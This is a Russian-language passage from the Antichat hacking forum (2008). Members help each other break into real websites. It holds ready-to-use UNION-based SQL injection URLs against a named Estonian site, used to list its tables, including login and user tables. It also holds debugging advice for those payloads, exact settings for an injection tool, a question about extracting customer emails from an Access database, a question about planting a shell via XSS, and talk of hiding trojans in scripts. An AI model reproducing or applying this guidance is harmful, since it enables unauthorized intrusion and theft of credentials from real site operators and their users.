28.08.2008, 00:19
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
>>Помоему это достаточно компактный и безпалевный вариант троянизации скриптов.
Лучше уж тогда $_REQUEST["act"], post или cookie по безпалевней будут. Хотя вариантов море впринципе.
|
|
|
28.08.2008, 00:33
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
С нами:
9457097
Репутация:
133
|
|
БД MS ACCESS
Код:
site.com/Def.asp?id=222+1,2,mail,4,5+from+costumers
возникла такая проблема знаю имя табцицы и имя нужной колонки каким образом можно вывести инфу ? лимита там нет можно чем нибудь заменить ? where тоже воспользоваться не получаеться ((
заранее спасибо
Последний раз редактировалось MaSTeR GэN; 28.08.2008 в 12:52..
|
|
|
|
28.08.2008, 18:45
|
|
Участник форума
Регистрация: 12.03.2008
Сообщений: 254
С нами:
9560218
Репутация:
238
|
|
Здраствуйте,у меня вот возникла такая проблема,я вот нашел уязвимость на сайте,я могу через ссылку в страницу запихнуть любой код, и html и javascript,все что вожу,все отображается на странице,вот только одно то что php никаким образом там не идет,я какой скрипт в страницу не запыхиваю,то сервер его не обрабатывает,а в исходном коде страницы виден всесь скрипт,и есче там фильтр перед ' и " ставит \ как можно залить шелл на етот сайт,есле пхп код когда оказывается в странице не работает....кста,а просто пхп там работает,там весь сайт построин из пхп страниц,и есче,там сервер у них стоит LiteSpeed Web Server может кто подскажит что делать дальше???
|
|
|
|
28.08.2008, 18:55
|
|
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
С нами:
9443906
Репутация:
3313
|
|
Сообщение от Mixon
Здраствуйте,у меня вот возникла такая проблема,я вот нашел уязвимость на сайте,я могу через ссылку в страницу запихнуть любой код, и html и javascript,все что вожу,все отображается на странице,вот только одно то что php никаким образом там не идет,я какой скрипт в страницу не запыхиваю,то сервер его не обрабатывает,а в исходном коде страницы виден всесь скрипт,и есче там фильтр перед ' и " ставит \ как можно залить шелл на етот сайт,есле пхп код когда оказывается в странице не работает....кста,а просто пхп там работает,там весь сайт построин из пхп страниц,и есче,там сервер у них стоит LiteSpeed Web Server может кто подскажит что делать дальше???
ыыыы давно так не смеялся =)
через xss ты не сможешь исполнить php код =), только яваскрипт на стороне клиента. Скорей бы школа..
|
|
|
|
29.08.2008, 01:06
|
|
Участник форума
Регистрация: 12.03.2008
Сообщений: 254
С нами:
9560218
Репутация:
238
|
|
Сообщение от ChaaK
ыыыы давно так не смеялся =)
через xss ты не сможешь исполнить php код =), только яваскрипт на стороне клиента. Скорей бы школа..
Гг,ето мне уже обьяснили)) Ну хоть веселее стало те))И за школу не боись,день рождение дьявола будет уже скоро, до 1 числа есче 3 дня....  есле бы 3 месяца...
|
|
|
|
28.08.2008, 19:59
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
С нами:
9457097
Репутация:
133
|
|
http://forum.antichat.ru/showpost.php?p=836658&postcount=3099
отвечю сам на cвой вопрос нужно юзать select TOP X * from table
выводит X стоку из table )
всем спасибо  |
|
|
|
29.08.2008, 01:33
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
С нами:
9834147
Репутация:
4
|
|
Всем снова здоавствуйте, такая проблема:
при запросе
_http://www.lacucaracha.ee/index.php?mod=komm&return_params=mod%3Dnews&f_id=2 &t_text=LAULUV%D5ISTLUSE%20FINAAL&h_id=-1+union+select+ TABLE_NAME,2,3,4+FROM+INFORMATION_SCHEMA.TABLES+LI MIT+23,1/**/
получаем:
Unknown column 'cucca_logins' in 'where clause'
если попробовать проработать таблицу 'cucca_logins':
_http://www.lacucaracha.ee/index.php?mod=komm&return_params=mod%3Dnews&f_id=2 &t_text=LAULUV%D5ISTLUSE%20FINAAL&h_id=-1+union+select+ COLUMN_NAME,2,3,4+FROM+INFORMATION_SCHEMA.COLUMNS+ where+TABLE_NAME=cucca_logins+limit+23,1/**/
И опять получаем:
Unknown column 'cucca_logins' in 'where clause'
с cucca_users таже истории
Помогите пожалуйста, что я делаю не так?
Последний раз редактировалось zjuk@; 29.08.2008 в 01:41..
|
|
|
|
29.08.2008, 01:37
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
во-первых, /**/ ты открыл комментарий и тут же его закрыл. измени /**/ на /* или --
во-вторых, возми в ковычки во втором запросе cucca_logins
в-третьих, пропиши limit 1,10 для начала
|
|
|
|
29.08.2008, 01:49
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
С нами:
9834147
Репутация:
4
|
|
Сообщение от AFoST
во-первых, /**/ ты открыл комментарий и тут же его закрыл. измени /**/ на /* или --
во-вторых, возми в ковычки во втором запросе cucca_logins
в-третьих, пропиши limit 1,10 для начала
с кавычками меня послали, LIMIT в данном случае значения не имеет, а замена /**/ на -- ни к чему не привела.
|
|
|
|
29.08.2008, 02:05
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
С нами:
10761096
Репутация:
27
|
|
Скачай SIPT (http://forum.antichat.ru/thread24918-SIPT.html)
Настройки поставь
Код:
URL=http://www.lacucaracha.ee/index.php?mod=komm&return_params=mod%3Dnews&f_id=2&t_text=LAULUV%D5ISTLUSE%20FINAAL&h_id=-1{SQLINJ}
Key=Unknown column
Search key by=Found
Close SQL=(ничего)
и все. /* тут вообще не надо и без него работает.
у меня работает и все находит.
Последний раз редактировалось Grema; 29.08.2008 в 02:21..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
